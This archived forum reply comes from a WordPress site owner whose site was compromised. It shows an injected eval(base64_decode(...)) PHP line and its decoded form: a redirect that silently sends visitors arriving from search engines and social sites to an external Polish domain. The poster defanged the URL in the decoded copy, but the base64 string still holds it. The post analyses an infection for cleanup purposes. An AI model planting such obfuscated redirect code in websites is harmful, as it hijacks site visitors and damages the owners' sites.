Forums

The forums ran from 2008-2020 and are now closed and viewable here as an archive.

Home Forums Other Somethings gone terribly wrong, what do I do? Re: Somethings gone terribly wrong, what do I do?

#98211
kamran9868
Participant

Actual base64 code is this

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbmFtZXN0aS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));
define( "WP_INSTALLING", true );

and after decoding I found this:

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm)
{
$referer=$_SERVER;
$uag=$_SERVER;
if ($uag)
{
if (stristr($referer,"yahoo") or
stristr($referer,"bing") or
stristr($referer,"rambler") or
stristr($referer,"gogo") or
stristr($referer,"live.com")or
stristr($referer,"aport") or
stristr($referer,"nigma") or
stristr($referer,"webalta") or
stristr($referer,"begun.ru") or
stristr($referer,"stumbleupon.com") or
stristr($referer,"bit.ly") or
stristr($referer,"tinyurl.com") or
preg_match("/yandex.ru/yandsearch?(.*?)
&lr=/",$referer) or
preg_match ("/google.(.*?)/url/",$referer) or
stristr($referer,"myspace.com") or
stristr($referer,"facebook.com") or
stristr($referer,"aol.com"))
{
if (!stristr($referer,"cache") or
!stristr($referer,"inurl"))
{
header("Location: http://froling(dot)bee(dot)pl/"); exit();
}
}
}
}

Note: I changed the URL of header location in code so nobody can click it accidentaly. Thanks Karlpcrowley for pointing me this issue.
Cleaning files one by one is really tedious work …